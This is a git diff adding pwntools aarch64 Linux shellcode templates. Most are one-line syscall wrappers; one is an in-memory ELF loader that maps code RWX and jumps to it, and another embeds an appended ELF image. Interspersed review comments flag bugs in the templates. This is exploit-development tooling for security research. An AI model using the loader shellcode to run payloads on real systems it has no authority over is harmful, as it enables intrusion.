000000000..58942410a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getresgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getresgid.asm new file mode 100644 index 000000000..c61465875 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getresuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getresuid.asm new file mode 100644 index 000000000..f109bb1d9 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getrlimit.asm b/pwnlib/shellcraft/templates/aarch64/linux/getrlimit.asm new file mode 100644 index 000000000..ee76fe8cd --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getrusage.asm b/pwnlib/shellcraft/templates/aarch64/linux/getrusage.asm new file mode 100644 index 000000000..ebb92d592 --- /dev/null 
+++ b/pwnlib/shellcraft/templates/aarch64/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getsid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getsid.asm new file mode 100644 index 000000000..9239324aa --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getsockname.asm b/pwnlib/shellcraft/templates/aarch64/linux/getsockname.asm new file mode 100644 index 000000000..9fa37a55b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getsockopt.asm b/pwnlib/shellcraft/templates/aarch64/linux/getsockopt.asm new file mode 100644 index 000000000..a24a2a713 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getsockopt.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/aarch64/linux/gettimeofday.asm new file mode 100644 index 000000000..d28c4baaf --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getuid.asm new file mode 100644 index 000000000..e9af2f109 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/gtty.asm b/pwnlib/shellcraft/templates/aarch64/linux/gtty.asm new file mode 100644 index 000000000..ceac69f42 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/gtty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ioctl.asm b/pwnlib/shellcraft/templates/aarch64/linux/ioctl.asm new file mode 100644 index 000000000..1660852c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ioperm.asm b/pwnlib/shellcraft/templates/aarch64/linux/ioperm.asm new file mode 100644 index 000000000..90d0d926b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/iopl.asm b/pwnlib/shellcraft/templates/aarch64/linux/iopl.asm new file mode 100644 index 000000000..45184f0fe --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/kill.asm b/pwnlib/shellcraft/templates/aarch64/linux/kill.asm new file mode 100644 index 000000000..c06e63889 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/kill.asm 
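Review bot: `<%page args="from, num, turn_on"/>` in ioperm.asm uses `from`, a Python reserved word, as a template argument; unless the template loader rewrites argument names, Mako turns page args into a Python function signature, so this template (and its `${syscall('SYS_ioperm', from, num, turn_on)}` expression) should fail with a SyntaxError when the template is compiled rather than when the shellcode is assembled. The same argument name appears in link.asm and linkat.asm further down. Renaming it consistently, `<%page args="from_, num, turn_on"/>` and `${syscall('SYS_ioperm', from_, num, turn_on)}`, keeps the positional order and avoids the keyword; since these files look generated from a syscall table, the fix presumably belongs in the generator.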
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, sig"/> +<%docstring> +Invokes the syscall kill. See 'man 2 kill' for more information. + +Arguments: + pid(pid_t): pid + sig(int): sig + + + ${syscall('SYS_kill', pid, sig)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/lchown.asm b/pwnlib/shellcraft/templates/aarch64/linux/lchown.asm new file mode 100644 index 000000000..6d3c02328 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/lchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/link.asm b/pwnlib/shellcraft/templates/aarch64/linux/link.asm new file mode 100644 index 000000000..0856abd09 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/link.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/linkat.asm b/pwnlib/shellcraft/templates/aarch64/linux/linkat.asm new file mode 100644 index 000000000..0b07a98ee --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/listen.asm b/pwnlib/shellcraft/templates/aarch64/linux/listen.asm new file mode 100644 index 000000000..3b076df13 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/listen.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, n"/> +<%docstring> +Invokes the syscall listen. See 'man 2 listen' for more information. + +Arguments: + fd(int): fd + n(int): n + + + ${syscall('SYS_listen', fd, n)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/loader.asm b/pwnlib/shellcraft/templates/aarch64/linux/loader.asm new file mode 100644 index 000000000..495b4b6bb --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/loader.asm 
@@ -0,0 +1,183 @@ +<% + from pwnlib.shellcraft.aarch64.linux import exit as exit + from pwnlib.shellcraft.aarch64.linux import mmap + from pwnlib.shellcraft.aarch64 import setregs, mov, memcpy + + from pwnlib.shellcraft import common + from pwnlib.util.packing import unpack +%> +<%page args="address"/> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Arguments: + address(int): Address of the ELF as a register or integer. + +<% +elf_magic = unpack('\x7fELF', 32) +die = common.label('die') +load_one = common.label('load_one') +next_phdr = common.label('next_phdr') + +""" +Elf64_Ehdr + +0x0000 e_ident : unsigned char [16] + +0x0010 e_type : Elf64_Half + +0x0012 e_machine : Elf64_Half + +0x0014 e_version : Elf64_Word + +0x0018 e_entry : Elf64_Addr + +0x0020 e_phoff : Elf64_Off + +0x0028 e_shoff : Elf64_Off + +0x0030 e_flags : Elf64_Word + +0x0034 e_ehsize : Elf64_Half + +0x0036 e_phentsize : Elf64_Half + +0x0038 e_phnum : Elf64_Half + +0x003a e_shentsize : Elf64_Half + +0x003c e_shnum : Elf64_Half + +0x003e e_shstrndx : Elf64_Half + +Elf64_Phdr + +0x0000 p_type : Elf64_Word + +0x0004 p_flags : Elf64_Word + +0x0008 p_offset : Elf64_Off + +0x0010 p_vaddr : Elf64_Addr + +0x0018 p_paddr : Elf64_Addr + +0x0020 p_filesz : Elf64_Xword + +0x0028 p_memsz : Elf64_Xword + +0x0030 p_align : Elf64_Xword +""" +e_entry = 0x0018 +e_phoff = 0x0020 +e_phnum = 0x0038 +e_phentsize = 0x0036 +p_type = 0x0000 +p_offset = 0x0008 +p_vaddr = 0x0010 +p_filesz = 0x0020 +p_memsz = 0x0028 + +PT_LOAD = 1 +%> + + ${setregs({'x0': address})} + + /* Check the ELF header */ + ldr x1, [x0] + ${mov('x2', elf_magic)} + cmp w1, w2 + bne ${die} + + /* Discover program headers */ + add x1, x0, #${e_phoff} + ldr x1, [x1] + add x1, x1, x0 /* x1 = &program headers */ + + add x2, x0, #${e_phentsize} + ldrh w2, [x2] /* x2 = program header size */ + + add x3, x0, #${e_phnum} + ldrh w3, [x3] /* x3 = number of program headers */ + +1: + /* For each section header, mmap it to the 
desired address */ + stp x0, x1, [sp, #-16]! + stp x2, x3, [sp, #-16]! + bl ${load_one} + ldp x2, x3, [sp], #16 + ldp x0, x1, [sp], #16 + + add x1, x1, x2 + subs x3, x3, #1 + bne 1b + + /* Everything is loaded and RWX. Find the entry point and call it */ + add x1, x0, #${e_entry} + ldr x1, [x1] + mov x8, x1 + + /* Set up the fake stack. + For whatever reason, aarch64 binaries really want AT_RANDOM + to be available. */ + /* AT_NULL */ + eor x0, x0, x0 + eor x1, x1, x1 + stp x0, x1, [sp, #-16]! + /* AT_RANDOM */ + mov x2, #25 + mov x3, sp + stp x2, x3, [sp, #-16]! + + /* argc, argv[0], argv[1], envp */ + /* ideally these could all be empty, but unfortunately + we have to keep the stack aligned. it's easier to + just push an extra argument than care... */ + stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ + mov x0, 1 + mov x1, sp + stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + + br x8 + +${load_one}: + /* x1 = &program headers */ + stp x29, x30, [sp, #-16]! + mov x29, sp + + /* If it's not a PT_LOAD header, don't care */ + add x2, x1, #${p_type} + ldr x2, [x2] + uxth w2, w2 /* zero-extend halfword */ + cmp x2, #${PT_LOAD} + bne ${next_phdr} + + /* Get the destination address into x2 */ + add x2, x1, ${p_vaddr} + ldr x2, [x2] + + /* Get the size to mmap into x3 */ + add x3, x1, #${p_memsz} + ldr x3, [x3] + lsr w3, w3, #12 + add x3, x3, #1 + + /* We can't move the program break with brk(), + so we basically have to fake it. Allocate + more space than we ever expect the heap to + need, by over-allocating space by 8x */ + lsl w3, w3, #12 + 4 + + /* Map the page in */ + stp x0, x1, [sp, #-16]! + stp x2, x3, [sp, #-16]! 
+ lsr w2, w2, #12 + lsl w2, w2, #12 + ${mmap('x2', 'x3', 'PROT_READ|PROT_WRITE|PROT_EXEC', 'MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED', 0, 0)} + /* Ignore failure */ + ldp x2, x3, [sp], #16 + ldp x0, x1, [sp], #16 + + /* Get the source address into x4 */ + add x4, x1, #${p_offset} + ldr x4, [x4] + add x4, x4, x0 + + /* Get the number of bytes into x5 */ + add x5, x1, #${p_filesz} + ldr x5, [x5] + + /* Copy the data */ + stp x0, x1, [sp, #-16]! + stp x2, x3, [sp, #-16]! + stp x4, x5, [sp, #-16]! + ${memcpy('x2','x4','x5')} + ldp x4, x5, [sp], #16 + ldp x2, x3, [sp], #16 + ldp x0, x1, [sp], #16 + +${next_phdr}: + mov sp, x29 + ldp x29, x30, [sp], #16 + ret x30 + +${die}: + ${exit(1)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/loader_append.asm b/pwnlib/shellcraft/templates/aarch64/linux/loader_append.asm new file mode 100644 index 000000000..d9db10a99 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/loader_append.asm 
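Review bot: The mmap result inside load_one is discarded (`/* Ignore failure */`), so if the MAP_FIXED mapping fails the following memcpy writes to an address that was never mapped and the process faults with no diagnostic, even though a `die` label already exists; a check right after the mmap expansion and before the registers are restored, `tbnz x0, #63, ${die}`, would route a negative-errno return there. Separately, the AT_RANDOM entry sets x3 to sp, which at that point is the 16 zero bytes just pushed as AT_NULL, so the loaded binary's stack-protector canary and pointer-guard seed derived from AT_RANDOM are all zeros; if that is intentional it deserves a comment such as `/* AT_RANDOM points at the zeroed AT_NULL entry, so the canary seed is deterministic */`. The over-allocation comment says 8x, but as I read it `lsl w3, w3, #12 + 4` shifts by 16, i.e. 16 pages per page of p_memsz, so either the comment or the shift is off. The `/* Check the ELF header */` block compares only the 4-byte magic; EI_CLASS and e_machine are not checked, so a 32-bit or foreign-architecture image passes and is parsed with Elf64 offsets.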
@@ -0,0 +1,54 @@ +<% + from pwnlib.shellcraft.aarch64.linux import loader + from pwnlib.shellcraft import common +%> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Similar to loader.asm but loads an appended ELF. + +Arguments: + data(str): If a valid filename, the data is loaded from the named file. + Otherwise, this is treated as raw ELF data to append. + If ``None``, it is ignored. + +Example: + +The following doctest is commented out because it doesn't work on Travis +for reasons I cannot diagnose. However, it should work just fine :-) + + # >>> gcc = process(['aarch64-linux-gnu-gcc','-xc','-static','-Wl,-Ttext-segment=0x20000000','-']) + # >>> gcc.write(''' + # ... int main() { + # ... printf("Hello, %s!\\n", "world"); + # ... } + # ... ''') + # >>> gcc.shutdown('send') + # >>> gcc.poll(True) + # 0 + # >>> sc = shellcraft.loader_append('a.out') + # >>> run_assembly(sc).recvline() + # 'Hello, world!\n' + + +<%page args="data = None"/> +<% +there = common.label('there') +here = common.label('here') +%> + b ${there} +${here}: + mov x0, x30 /* lr */ + ${loader('x0')} +${there}: + bl ${here} +%if data: +<% +import os + +if os.path.isfile(data): + with open(data, 'rb') as f: + data = f.read() +%> + ${'.string "%s"' % ''.join('\\x%02x' % c for c in bytearray(data))} +%endif diff --git a/pwnlib/shellcraft/templates/aarch64/linux/lseek.asm b/pwnlib/shellcraft/templates/aarch64/linux/lseek.asm new file mode 100644 index 000000000..a41cf237b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} 
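Review bot: `os.path.isfile(data)` is called on whatever was passed, but the docstring also allows raw ELF bytes, and every ELF image contains NUL bytes in the e_ident padding; as far as I can tell `os.path.isfile` raises `TypeError` on a string with embedded NULs instead of returning False, so the documented raw-data path never reaches the `.string` emission. Guarding the check, `if '\x00' not in data and os.path.isfile(data):`, keeps the filename convenience while making the raw-data case work. The docstring could also note that the appended image is emitted via `.string`, which adds a trailing NUL byte to the data — harmless for an ELF, but surprising if the template is reused for other payloads.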
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/lstat.asm b/pwnlib/shellcraft/templates/aarch64/linux/lstat.asm new file mode 100644 index 000000000..e11062bf6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/lstat64.asm b/pwnlib/shellcraft/templates/aarch64/linux/lstat64.asm new file mode 100644 index 000000000..2c9cc87fd --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/madvise.asm b/pwnlib/shellcraft/templates/aarch64/linux/madvise.asm new file mode 100644 index 000000000..aeb4e66c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, len, advice)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mincore.asm b/pwnlib/shellcraft/templates/aarch64/linux/mincore.asm new file mode 100644 index 000000000..442ec81e5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mincore.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mkdir.asm b/pwnlib/shellcraft/templates/aarch64/linux/mkdir.asm new file mode 100644 index 000000000..3b8190bab --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mkdirat.asm b/pwnlib/shellcraft/templates/aarch64/linux/mkdirat.asm new file mode 100644 index 000000000..dd00c58f5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mknod.asm b/pwnlib/shellcraft/templates/aarch64/linux/mknod.asm new file mode 100644 index 000000000..7b0f0a281 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mknodat.asm b/pwnlib/shellcraft/templates/aarch64/linux/mknodat.asm new file mode 100644 index 000000000..d15befe0f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mlock.asm b/pwnlib/shellcraft/templates/aarch64/linux/mlock.asm new file mode 100644 index 000000000..c984ece44 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mlockall.asm b/pwnlib/shellcraft/templates/aarch64/linux/mlockall.asm new file mode 100644 index 000000000..d498a4963 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mmap.asm b/pwnlib/shellcraft/templates/aarch64/linux/mmap.asm new file mode 100644 index 000000000..97e183a03 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mmap.asm 
@@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, length, prot, flags, fd, offset"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mprotect.asm b/pwnlib/shellcraft/templates/aarch64/linux/mprotect.asm new file mode 100644 index 000000000..31a544eb2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + len(size_t): len + prot(int): prot + + + ${syscall('SYS_mprotect', addr, len, prot)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mq_notify.asm b/pwnlib/shellcraft/templates/aarch64/linux/mq_notify.asm new file mode 100644 index 000000000..73aab0ca3 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mq_notify.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mq_open.asm b/pwnlib/shellcraft/templates/aarch64/linux/mq_open.asm new file mode 100644 index 000000000..907c38215 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mq_open.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/aarch64/linux/mq_timedreceive.asm new file mode 100644 index 000000000..c21cf1936 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/aarch64/linux/mq_timedsend.asm new file mode 100644 index 000000000..5e7f1cacf --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} 
